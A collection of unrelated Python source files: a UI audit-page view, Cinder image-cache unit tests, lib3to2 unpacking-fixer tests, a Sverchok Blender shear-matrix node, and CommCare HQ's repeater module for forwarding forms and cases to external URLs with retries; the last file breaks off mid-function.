'statuses_audit': {
'page_type': 'Status',
'object_type': 'statuses',
},
'tags_audit': {
'page_type': 'Tags',
'object_type': 'tags',
},
}
params = meta[request.matched_route.name]
page_title_name = '{0}_audit'.format(params['object_type'])
uri = '/api/{0}_audit'.format(params['object_type'])
payload = {}
for k in request.GET:
payload[k] = request.GET[k]
# Force the UI to 50 results per page
if not perpage:
perpage = 50
payload['perpage'] = perpage
LOG.info('UI requesting data from API={0},payload={1}'.format(uri, payload))
resp = _api_get(request, uri, payload)
total = 0
objects_audit = []
if resp:
total = resp['meta']['total']
objects_audit = resp['results']
nav_urls = get_nav_urls(request.path, offset, perpage, total, payload)
# Used by the columns menu to determine what to show/hide.
column_selectors = [
{'name': 'created', 'pretty_name': 'Date Created'},
{'name': 'field', 'pretty_name': 'Field'},
{'name': 'new_value', 'pretty_name': 'New Value'},
{'name': 'node_audit_id', 'pretty_name': 'Audit ID'},
{'name': 'object_id', 'pretty_name': '{0} ID'.format(params['page_type'])},
{'name': 'old_value', 'pretty_name': 'Old Value'},
{'name': 'updated_by', 'pretty_name': 'Updated By'},
]
return {
'au': auth_user,
'column_selectors': column_selectors,
'layout': site_layout('max'),
'nav_urls': nav_urls,
'objects_audit': objects_audit,
'offset': offset,
'page_title_name': page_title_name,
'page_title_type': page_title_type,
'params': params,
'perpage': perpage,
'total': total,
}
|
# Copyright (C) 2015 Pure Storage, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import ddt
import mock
from oslo_utils import timeutils
from cinder import context as ctxt
from cinder.db.sqlalchemy import models
from cinder.image import cache as image_cache
from cinder import objects
from cinder import test
from cinder.tests.unit import fake_constants as fake
@ddt.ddt
class ImageVolumeCacheTestCase(test.TestCase):
def setUp(self):
super(ImageVolumeCacheTestCase, self).setUp()
self.mock_db = mock.Mock()
self.mock_volume_api = mock.Mock()
self.context = ctxt.get_admin_context()
self.volume = models.Volume()
vol_params = {'id': fake.VOLUME_ID,
'host': 'foo@bar#whatever',
'cluster_name': 'cluster',
'size': 0}
self.volume.update(vol_params)
self.volume_ovo = objects.Volume(self.context, **vol_params)
def _build_cache(self, max_gb=0, max_count=0):
cache = image_cache.ImageVolumeCache(self.mock_db,
self.mock_volume_api,
max_gb,
max_count)
cache.notifier = self.notifier
return cache
def _build_entry(self, size=10):
entry = {
'id': 1,
'host': 'test@foo#bar',
'cluster_name': 'cluster@foo#bar',
'image_id': 'c7a8b8d4-e519-46c7-a0df-ddf1b9b9fff2',
'image_updated_at': timeutils.utcnow(with_timezone=True),
'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b',
'size': size,
'last_used': timeutils.utcnow(with_timezone=True)
}
return entry
def test_get_by_image_volume(self):
cache = self._build_cache()
ret = {'id': 1}
volume_id = '70a599e0-31e7-49b7-b260-868f441e862b'
self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertEqual(ret, entry)
self.mock_db.image_volume_cache_get_by_volume_id.return_value = None
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertIsNone(entry)
def test_evict(self):
cache = self._build_cache()
entry = self._build_entry()
cache.evict(self.context, entry)
self.mock_db.image_volume_cache_delete.assert_called_once_with(
self.context,
entry['volume_id']
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.evict', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@ddt.data(True, False)
def test_get_entry(self, clustered):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at']
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
if not clustered:
self.volume_ovo.cluster_name = None
expect = {'host': self.volume.host}
else:
expect = {'cluster_name': self.volume.cluster_name}
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertDictEqual(entry, found_entry)
(self.mock_db.
image_volume_cache_get_and_update_last_used.assert_called_once_with)(
self.context,
entry['image_id'],
**expect
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.hit', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_get_entry_not_exists(self):
cache = self._build_cache()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': timeutils.utcnow(with_timezone=True)
}
image_id = 'c7a8b8d4-e519-46c7-a0df-ddf1b9b9fff2'
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = None
found_entry = cache.get_entry(self.context,
self.volume_ovo,
image_id,
image_meta)
self.assertIsNone(found_entry)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(image_id, msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@mock.patch('cinder.objects.Volume.get_by_id')
def test_get_entry_needs_update(self, mock_volume_by_id):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at'] + timedelta(hours=2)
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
mock_volume = mock.MagicMock()
mock_volume_by_id.return_value = mock_volume
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
# Expect that the cache entry is not returned and the image-volume
# for it is deleted.
self.assertIsNone(found_entry)
self.mock_volume_api.delete.assert_called_with(self.context,
mock_volume)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_create_cache_entry(self):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'updated_at': entry['image_updated_at']
}
self.mock_db.image_volume_cache_create.return_value = entry
created_entry = cache.create_cache_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertEqual(entry, created_entry)
self.mock_db.image_volume_cache_create.assert_called_once_with(
self.context,
self.volume_ovo.host,
self.volume_ovo.cluster_name,
entry['image_id'],
entry['image_updated_at'].replace(tzinfo=None),
self.volume_ovo.id,
self.volume_ovo.size
)
def test_ensure_space_unlimited(self):
cache = self._build_cache(max_gb=0, max_count=0)
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
self.volume.size = 500
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
def test_ensure_space_no_entries(self):
cache = self._build_cache(max_gb=100, max_count=10)
self.mock_db.image_volume_cache_get_all.return_value = []
self.volume_ovo.size = 5
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.volume_ovo.size = 101
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
def test_ensure_space_need_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=12)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=10)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 15
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_need_count(self):
cache = self._build_cache(max_gb=30, max_count=2)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 12
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(1, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
def test_ensure_space_need_gb_and_count(self):
cache = self._build_cache(max_gb=30, max_count=3)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=12)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 16
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_cant_free_enough_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = [self._build_entry(size=25)]
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 50
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
mock_delete.assert_not_called()
|
from test_all_fixers import lib3to2FixerTestCase
class Test_unpacking(lib3to2FixerTestCase):
fixer = u'unpacking'
def test_unchanged(self):
s = u"def f(*args): pass"
self.unchanged(s)
s = u"for i in range(s): pass"
self.unchanged(s)
s = u"a, b, c = range(100)"
self.unchanged(s)
def test_forloop(self):
b = u"""
for a, b, c, *d, e in two_dim_array: pass"""
a = u"""
for _3to2iter in two_dim_array:
_3to2list = list(_3to2iter)
a, b, c, d, e, = _3to2list[:3] + [_3to2list[3:-1]] + _3to2list[-1:]
pass"""
self.check(b, a)
b = u"""
for a, b, *c in some_thing:
do_stuff"""
a = u"""
for _3to2iter in some_thing:
_3to2list = list(_3to2iter)
a, b, c, = _3to2list[:2] + [_3to2list[2:]]
do_stuff"""
self.check(b, a)
b = u"""
for *a, b, c, d, e, f, g in some_thing:
pass"""
a = u"""
for _3to2iter in some_thing:
_3to2list = list(_3to2iter)
a, b, c, d, e, f, g, = [_3to2list[:-6]] + _3to2list[-6:]
pass"""
self.check(b, a)
def test_assignment(self):
b = u"""
a, *b, c = range(100)"""
a = u"""
_3to2list = list(range(100))
a, b, c, = _3to2list[:1] + [_3to2list[1:-1]] + _3to2list[-1:]"""
self.check(b, a)
b = u"""
a, b, c, d, *e, f, g = letters"""
a = u"""
_3to2list = list(letters)
a, b, c, d, e, f, g, = _3to2list[:4] + [_3to2list[4:-2]] + _3to2list[-2:]"""
self.check(b, a)
b = u"""
*e, f, g = letters"""
a = u"""
_3to2list = list(letters)
e, f, g, = [_3to2list[:-2]] + _3to2list[-2:]"""
self.check(b, a)
b = u"""
a, b, c, d, *e = stuff"""
a = u"""
_3to2list = list(stuff)
a, b, c, d, e, = _3to2list[:4] + [_3to2list[4:]]"""
self.check(b, a)
b = u"""
*z, = stuff"""
a = u"""
_3to2list = list(stuff)
z, = [_3to2list[:]]"""
self.check(b, a)
b = u"""
while True:
a, *b, c = stuff
other_stuff = make_more_stuff(a, b, c)"""
a = u"""
while True:
_3to2list = list(stuff)
a, b, c, = _3to2list[:1] + [_3to2list[1:-1]] + _3to2list[-1:]
other_stuff = make_more_stuff(a, b, c)"""
self.check(b, a)
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import EnumProperty, FloatProperty
from mathutils import Matrix
from sverchok.node_tree import SverchCustomTreeNode, StringsSocket
from sverchok.data_structure import (updateNode, fullList, Matrix_listing,
SvSetSocketAnyType, SvGetSocketAnyType)
class MatrixShearNode(bpy.types.Node, SverchCustomTreeNode):
''' Construct a Shear Matrix '''
bl_idname = 'MatrixShearNode'
bl_label = 'Shear Matrix'
bl_icon = 'OUTLINER_OB_EMPTY'
# select Shear plane
mode_items = [
("XY", "XY-plane", ""),
("XZ", "XZ-plane", ""),
("YZ", "YZ-plane", ""),
]
factor1_ = FloatProperty(name='Factor 1', description='Factor1',
default=0.0,
options={'ANIMATABLE'}, update=updateNode)
factor2_ = FloatProperty(name='Factor 2', description='Factor2',
default=0.0,
options={'ANIMATABLE'}, update=updateNode)
plane_ = EnumProperty(name="Plane", description="Shear plane choice",
default="XY", items=mode_items,
update=updateNode)
def sv_init(self, context):
self.inputs.new('StringsSocket', "Factor1").prop_name = 'factor1_'
self.inputs.new('StringsSocket', "Factor2").prop_name = 'factor2_'
self.outputs.new('MatrixSocket', "Matrix", "Matrix")
def draw_buttons(self, context, layout):
layout.prop(self, "plane_", "Shear plane:", expand=True)
def process(self):
if not self.outputs['Matrix'].is_linked:
return
# inputs
factor1 = self.inputs['Factor1'].sv_get()
factor2 = self.inputs['Factor2'].sv_get()
# outputs
max_l = max(len(factor1), len(factor2))
fullList(factor1, max_l)
fullList(factor2, max_l)
matrixes_ = []
for i in range(max_l):
max_inner = max(len(factor1[i]), len(factor2[i]))
fullList(factor1[i], max_inner)
fullList(factor2[i], max_inner)
for j in range(max_inner):
matrixes_.append(Matrix.Shear(self.plane_, 4, (factor1[i][j], factor2[i][j])))
matrixes = Matrix_listing(matrixes_)
self.outputs['Matrix'].sv_set(matrixes)
def register():
bpy.utils.register_class(MatrixShearNode)
def unregister():
bpy.utils.unregister_class(MatrixShearNode)
|
import base64
from collections import namedtuple
from datetime import datetime, timedelta
import logging
import urllib
import urlparse
from django.utils.translation import ugettext_lazy as _
from requests.exceptions import Timeout, ConnectionError
from corehq.apps.cachehq.mixins import QuickCachedDocumentMixin
from corehq.form_processor.exceptions import XFormNotFound
from corehq.util.datadog.metrics import REPEATER_ERROR_COUNT
from corehq.util.datadog.utils import log_counter
from corehq.util.quickcache import quickcache
from dimagi.ext.couchdbkit import *
from couchdbkit.exceptions import ResourceNotFound
from django.core.cache import cache
import hashlib
from casexml.apps.case.xml import V2, LEGAL_VERSIONS
from corehq.apps.receiverwrapper.exceptions import DuplicateFormatException, IgnoreDocument
from corehq.form_processor.interfaces.dbaccessors import FormAccessors, CaseAccessors
from couchforms.const import DEVICE_LOG_XMLNS
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.parsing import json_format_datetime
from dimagi.utils.mixins import UnicodeMixIn
from dimagi.utils.post import simple_post
from .dbaccessors import (
get_pending_repeat_record_count,
get_failure_repeat_record_count,
get_success_repeat_record_count,
)
from .const import (
MAX_RETRY_WAIT,
MIN_RETRY_WAIT,
RECORD_FAILURE_STATE,
RECORD_SUCCESS_STATE,
RECORD_PENDING_STATE,
POST_TIMEOUT,
)
from .exceptions import RequestConnectionError
from .utils import get_all_repeater_types
def simple_post_with_cached_timeout(data, url, expiry=60 * 60, force_send=False, *args, **kwargs):
# no control characters (e.g. '/') in keys
key = hashlib.md5(
'{0} timeout {1}'.format(__name__, url)
).hexdigest()
cache_value = cache.get(key)
if cache_value and not force_send:
raise RequestConnectionError(cache_value)
try:
resp = simple_post(data, url, *args, **kwargs)
except (Timeout, ConnectionError), e:
cache.set(key, e.message, expiry)
raise RequestConnectionError(e.message)
if not 200 <= resp.status_code < 300:
message = u'Status Code {}: {}'.format(resp.status_code, resp.reason)
cache.set(key, message, expiry)
raise RequestConnectionError(message)
return resp
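# Illustrative usage sketch (hypothetical caller, not existing code): a failed
# POST caches the error message under a URL-derived key for `expiry` seconds,
# so subsequent calls fail fast with RequestConnectionError instead of
# re-trying a known-bad endpoint; pass force_send=True to bypass the cache.
#
#     try:
#         simple_post_with_cached_timeout(payload, url, force_send=False)
#     except RequestConnectionError:
#         pass  # hypothetical handling: requeue or log the failure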
DELETED = "-Deleted"
FormatInfo = namedtuple('FormatInfo', 'name label generator_class')
PostInfo = namedtuple('PostInfo', 'payload headers force_send max_tries')
class GeneratorCollection(object):
"""Collection of format_name to Payload Generators for a Repeater class
args:
repeater_class: A valid child class of Repeater class
"""
def __init__(self, repeater_class):
self.repeater_class = repeater_class
self.default_format = ''
self.format_generator_map = {}
def add_new_format(self, format_name, format_label, generator_class, is_default=False):
"""Adds a new format->generator mapping to the collection
args:
format_name: unique name to identify the format
format_label: label to be displayed to the user
generator_class: child class of .repeater_generators.BasePayloadGenerator
kwargs:
is_default: True if the format_name should be default format
exceptions:
raises DuplicateFormatException if a format is added with is_default
while another default already exists
raises DuplicateFormatException if format_name already exists in the collection
"""
if is_default and self.default_format:
raise DuplicateFormatException("A default format already exists for this repeater.")
elif is_default:
self.default_format = format_name
if format_name in self.format_generator_map:
raise DuplicateFormatException("There is already a Generator with this format name.")
self.format_generator_map[format_name] = FormatInfo(
name=format_name,
label=format_label,
generator_class=generator_class
)
def get_default_format(self):
"""returns default format"""
return self.default_format
def get_default_generator(self):
"""returns generator class for the default format"""
return self.format_generator_map[self.default_format].generator_class
def get_all_formats(self, for_domain=None):
"""returns all the formats added to this repeater collection"""
return [(name, format.label) for name, format in self.format_generator_map.iteritems()
if not for_domain or format.generator_class.enabled_for_domain(for_domain)]
def get_generator_by_format(self, format):
"""returns generator class given a format"""
return self.format_generator_map[format].generator_class
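# Illustrative usage sketch (generator class names are hypothetical): register
# two payload formats for a repeater class and resolve them back.
#
#     collection = GeneratorCollection(FormRepeater)
#     collection.add_new_format('form_xml', 'XML', XMLPayloadGenerator,
#                               is_default=True)
#     collection.add_new_format('form_json', 'JSON', JSONPayloadGenerator)
#     collection.get_default_format()                   # -> 'form_xml'
#     collection.get_generator_by_format('form_json')   # -> JSONPayloadGenerator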
class Repeater(QuickCachedDocumentMixin, Document, UnicodeMixIn):
"""
Represents the configuration of a repeater. Will specify the URL to forward to and
other properties of the configuration.
"""
base_doc = 'Repeater'
domain = StringProperty()
url = StringProperty()
format = StringProperty()
use_basic_auth = BooleanProperty(default=False)
username = StringProperty()
password = StringProperty()
friendly_name = _("Data")
@classmethod
def get_custom_url(cls, domain):
return None
@classmethod
def available_for_domain(cls, domain):
"""Returns whether this repeater can be used by a particular domain
"""
return True
def get_pending_record_count(self):
return get_pending_repeat_record_count(self.domain, self._id)
def get_failure_record_count(self):
return get_failure_repeat_record_count(self.domain, self._id)
def get_success_record_count(self):
return get_success_repeat_record_count(self.domain, self._id)
def format_or_default_format(self):
from corehq.apps.repeaters.repeater_generators import RegisterGenerator
return self.format or RegisterGenerator.default_format_by_repeater(self.__class__)
def get_payload_generator(self, payload_format):
from corehq.apps.repeaters.repeater_generators import RegisterGenerator
gen = RegisterGenerator.generator_class_by_repeater_format(self.__class__, payload_format)
return gen(self)
def payload_doc(self, repeat_record):
raise NotImplementedError
def get_payload(self, repeat_record):
generator = self.get_payload_generator(self.format_or_default_format())
return generator.get_payload(repeat_record, self.payload_doc(repeat_record))
def register(self, payload, next_check=None):
if not self.allowed_to_forward(payload):
return
repeat_record = RepeatRecord(
repeater_id=self.get_id,
repeater_type=self.doc_type,
domain=self.domain,
next_check=next_check or datetime.utcnow(),
payload_id=payload.get_id
)
repeat_record.save()
return repeat_record
def allowed_to_forward(self, payload):
"""
        Return True/False depending on whether the payload meets forwarding criteria or not
"""
return True
def clear_caches(self):
if self.__class__ == Repeater:
cls = self.get_class_from_doc_type(self.doc_type)
else:
cls = self.__class__
# clear cls.by_domain (i.e. filtered by doc type)
Repeater.by_domain.clear(cls, self.domain)
# clear Repeater.by_domain (i.e. not filtered by doc type)
Repeater.by_domain.clear(Repeater, self.domain)
@classmethod
@quickcache(['cls.__name__', 'domain'], timeout=5 * 60, memoize_timeout=10)
def by_domain(cls, domain):
key = [domain]
if cls.__name__ in get_all_repeater_types():
key.append(cls.__name__)
elif cls.__name__ == Repeater.__name__:
# In this case the wrap function delegates to the
# appropriate sub-repeater types.
pass
else:
# Any repeater type can be posted to the API, and the installed apps
# determine whether we actually know about it.
            # But if we do not know about it, then we may as well return nothing now
return []
raw_docs = cls.view('receiverwrapper/repeaters',
startkey=key,
endkey=key + [{}],
include_docs=True,
reduce=False,
wrap_doc=False
)
return [cls.wrap(repeater_doc['doc']) for repeater_doc in raw_docs
if cls.get_class_from_doc_type(repeater_doc['doc']['doc_type'])]
@classmethod
def wrap(cls, data):
if cls.__name__ == Repeater.__name__:
cls_ = cls.get_class_from_doc_type(data['doc_type'])
if cls_:
return cls_.wrap(data)
else:
raise ResourceNotFound('Unknown repeater type: %s' % data)
else:
return super(Repeater, cls).wrap(data)
@staticmethod
def get_class_from_doc_type(doc_type):
doc_type = doc_type.replace(DELETED, '')
repeater_types = get_all_repeater_types()
if doc_type in repeater_types:
return repeater_types[doc_type]
else:
return None
def retire(self):
if DELETED not in self['doc_type']:
self['doc_type'] += DELETED
if DELETED not in self['base_doc']:
self['base_doc'] += DELETED
self.save()
    def get_url(self, repeat_record):
# to be overridden
return self.url
def allow_retries(self, response):
"""Whether to requeue the repeater when it fails
"""
return True
def allow_immediate_retries(self, response):
"""Whether to retry failed requests immediately a few times
"""
return True
def get_headers(self, repeat_record):
# to be overridden
generator = self.get_payload_generator(self.format_or_default_format())
headers = generator.get_headers()
if self.use_basic_auth:
user_pass = base64.encodestring(':'.join((self.username, self.password))).replace('\n', '')
headers.update({'Authorization': 'Basic ' + user_pass})
return headers
def handle_success(self, response, repeat_record):
"""handle a successful post
"""
generator = self.get_payload_generator(self.format_or_default_format())
return generator.handle_success(response, self.payload_doc(repeat_record))
def handle_failure(self, response, repeat_record):
"""handle a failed post
"""
generator = self.get_payload_generator(self.format_or_default_format())
return generator.handle_failure(response, self.payload_doc(repeat_record))
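# Sketch of the minimal override surface for a custom repeater: subclasses
# usually only need payload_doc() plus an allowed_to_forward() filter. Kept
# in comments so no new doc type is registered here; DesignDocRepeater and
# get_design_doc are hypothetical names.
# class DesignDocRepeater(Repeater):
#     friendly_name = _("Forward Design Docs")
#     def payload_doc(self, repeat_record):
#         return get_design_doc(repeat_record.domain, repeat_record.payload_id)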
class FormRepeater(Repeater):
"""
Record that forms should be repeated to a new url
"""
include_app_id_param = BooleanProperty(default=True)
white_listed_form_xmlns = StringListProperty(default=[]) # empty value means all form xmlns are accepted
friendly_name = _("Forward Forms")
@memoized
def payload_doc(self, repeat_record):
return FormAccessors(repeat_record.domain).get_form(repeat_record.payload_id)
def allowed_to_forward(self, payload):
return (
payload.xmlns != DEVICE_LOG_XMLNS and
(not self.white_listed_form_xmlns or payload.xmlns in self.white_listed_form_xmlns)
)
def get_url(self, repeat_record):
url = super(FormRepeater, self).get_url(repeat_record)
if not self.include_app_id_param:
return url
else:
# adapted from http://stackoverflow.com/a/2506477/10840
url_parts = list(urlparse.urlparse(url))
query = urlparse.parse_qsl(url_parts[4])
query.append(("app_id", self.payload_doc(repeat_record).app_id))
url_parts[4] = urllib.urlencode(query)
return urlparse.urlunparse(url_parts)
def get_headers(self, repeat_record):
headers = super(FormRepeater, self).get_headers(repeat_record)
headers.update({
"received-on": self.payload_doc(repeat_record).received_on.isoformat()+"Z"
})
return headers
def __unicode__(self):
return "forwarding forms to: %s" % self.url
class CaseRepeater(Repeater):
"""
Record that cases should be repeated to a new url
"""
version = StringProperty(default=V2, choices=LEGAL_VERSIONS)
white_listed_case_types = StringListProperty(default=[]) # empty value means all case-types are accepted
    black_listed_users = StringListProperty(default=[])  # users whose caseblock submissions should be ignored
friendly_name = _("Forward Cases")
def allowed_to_forward(self, payload):
return self._allowed_case_type(payload) and self._allowed_user(payload)
def _allowed_case_type(self, payload):
return not self.white_listed_case_types or payload.type in self.white_listed_case_types
def _allowed_user(self, payload):
return self.payload_user_id(payload) not in self.black_listed_users
def payload_user_id(self, payload):
# get the user_id who submitted the payload, note, it's not the owner_id
return payload.actions[-1].user_id
@memoized
def payload_doc(self, repeat_record):
return CaseAccessors(repeat_record.domain).get_case(repeat_record.payload_id)
def get_headers(self, repeat_record):
headers = super(CaseRepeater, self).get_headers(repeat_record)
headers.update({
"server-modified-on": self.payload_doc(repeat_record).server_modified_on.isoformat()+"Z"
})
return headers
def __unicode__(self):
return "forwarding cases to: %s" % self.url
class ShortFormRepeater(Repeater):
"""
Record that form id & case ids should be repeated to a new url
"""
version = StringProperty(default=V2, choices=LEGAL_VERSIONS)
friendly_name = _("Forward Form Stubs")
@memoized
def payload_doc(self, repeat_record):
return FormAccessors(repeat_record.domain).get_form(repeat_record.payload_id)
def allowed_to_forward(self, payload):
return payload.xmlns != DEVICE_LOG_XMLNS
def get_headers(self, repeat_record):
headers = super(ShortFormRepeater, self).get_headers(repeat_record)
headers.update({
"received-on": self.payload_doc(repeat_record).received_on.isoformat()+"Z"
})
return headers
def __unicode__(self):
return "forwarding short form to: %s" % self.url
class AppStructureRepeater(Repeater):
friendly_name = _("Forward App Schema Changes")
def payload_doc(self, repeat_record):
return None
class RepeatRecord(Document):
"""
    A record of a particular instance of something that needs to be forwarded
with a link to the proper repeater object
"""
repeater_id = StringProperty()
repeater_type = StringProperty()
domain = StringProperty()
last_checked = DateTimeProperty()
next_check = DateTimeProperty()
succeeded = BooleanProperty(default=False)
failure_reason = StringProperty()
payload_id = StringProperty()
@property
@memoized
def repeater(self):
return Repeater.get(self.repeater_id)
@property
def url(self):
try:
return self.repeater.get_url(self)
except (XFormNotFound, ResourceNotFound):
return None
@property
def state(self):
state = RECORD_PENDING_STATE
if self.succeeded:
state = RECORD_SUCCESS_STATE
elif self.failure_reason:
state = RECORD_FAILURE_STATE
return state
@classmethod
def all(cls, domain=None, due_before=None, limit=None):
json_now = json_format_datetime(due_before or datetime.utcnow())
repeat_records = RepeatRecord.view("receiverwrapper/repeat_records_by_next_check",
startkey=[domain],
endkey=[domain, json_now, {}],
include_docs=True,
reduce=False,
limit=limit,
)
return repeat_records
@classmethod
def count(cls, domain=None):
results = RepeatRecord.view("receiverwrapper/repeat_records_by_next_check",
startkey=[domain],
endkey=[domain, {}],
reduce=True,
).one()
return results['value'] if results else 0
def set_next_try(self, reason=None):
# we use an exponential back-off to avoid submitting to bad urls
# too frequently.
assert self.succeeded is False
assert self.next_check is not None
now = datetime.utcnow()
window = timedelta(minutes=0)
if self.last_checked:
window = self.next_check - self.last_checked
window += (window // 2) # window *= 1.5
if window < MIN_RETRY_WAIT:
window = MIN_RETRY_WAIT
elif window > MAX_RETRY_WAIT:
window = MAX_RETRY_WAIT
self.last_checked = now
self.next_check = self.last_checked + window
def try_now(self):
        # a record is eligible for another attempt as long as it hasn't
        # succeeded; next_check decides when that attempt is actually due
return not self.succeeded
def get_payload(self):
try:
return self.repeater.get_payload(self)
except ResourceNotFound as e:
# this repeater is pointing at a missing document
# quarantine it and tell it to stop trying.
logging.exception(
            u'Repeat record {} in domain {} references a missing or deleted document!'.format(
self._id, self.domain,
))
self._payload_exception(e, reraise=False)
except IgnoreDocument:
# this repeater is pointing at a document with no payload
        logging.info(u'Repeat record {} in domain {} references a document with no payload'.format(
self._id, self.domain,
))
# Mark it succeeded so that we don't try again
self.update_success()
except Exception as e:
self._payload_exception(e, reraise=True)
def _payload_exception(self, exception, reraise=False):
self.doc_type = self.doc_type + '-Failed'
self.failure_reason = unicode(exception)
self.save()
if reraise:
raise exception
def fire(self, max_tries=3, force_send=False):
headers = self.repeater.get_headers(self)
if self.try_now() or force_send:
tries = 0
post_info = PostInfo(self.get_payload(), headers, force_send, max_tries)
self.post(post_info, tries=tries)
def post(self, post_info, tries=0):
tries += 1
try:
response = simple_post_with_cached_timeout(
post_info.payload,
self.url,
headers=post_info.headers,
force_send=post_info.force_send,
timeout=POST_TIMEOUT,
)
        except Exception as e:
self.handle_exception(e)
else:
return self.handle_response(response, post_info, tries)
def handle_response(self, response, post_info, tries):
if 200 <= response.status_code < 300:
return self.handle_success(response)
else:
return self.handle_failure(response, post_info, tries)
def handle_success(self, response):
"""Do something with the response if the repeater succeeds
"""
self.last_checked = datetime.utcnow()
self.next_check = None
self.succeeded = True
self.repeater.handle_success(response, self)
def handle_failure(self, response, post_info, tries):
"""Do something with the response if the repeater fails
"""
if tries < post_info.max_tries and self.repeater.allow_immediate_retries(response):
return self.post(post_info, tries)
else:
self._fail(u'{}: {}'.format(response.status_code, response.reason), response)
self.repeater.handle_failure(response, self)
def handle_exception(self, exception):
"""handle internal exceptions
"""
self._fail(unicode(exception), None)
def _fail(self, reason, response):
if self.repeater.allow_retries(response):
self.set_next_try()
self.failure_reason = reason
log_counter(REPEATER_ERROR_COUNT, {
'_id': self._id,
'reason': reason,
'target_url': self.url,
})
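# For illustration, the retry window computed by RepeatRecord.set_next_try as
# a pure function: grow the previous window by half and clamp it to the
# MIN_RETRY_WAIT/MAX_RETRY_WAIT bounds this module already relies on.
def _example_retry_window(last_checked, next_check):
    window = timedelta(minutes=0)
    if last_checked:
        window = next_check - last_checked
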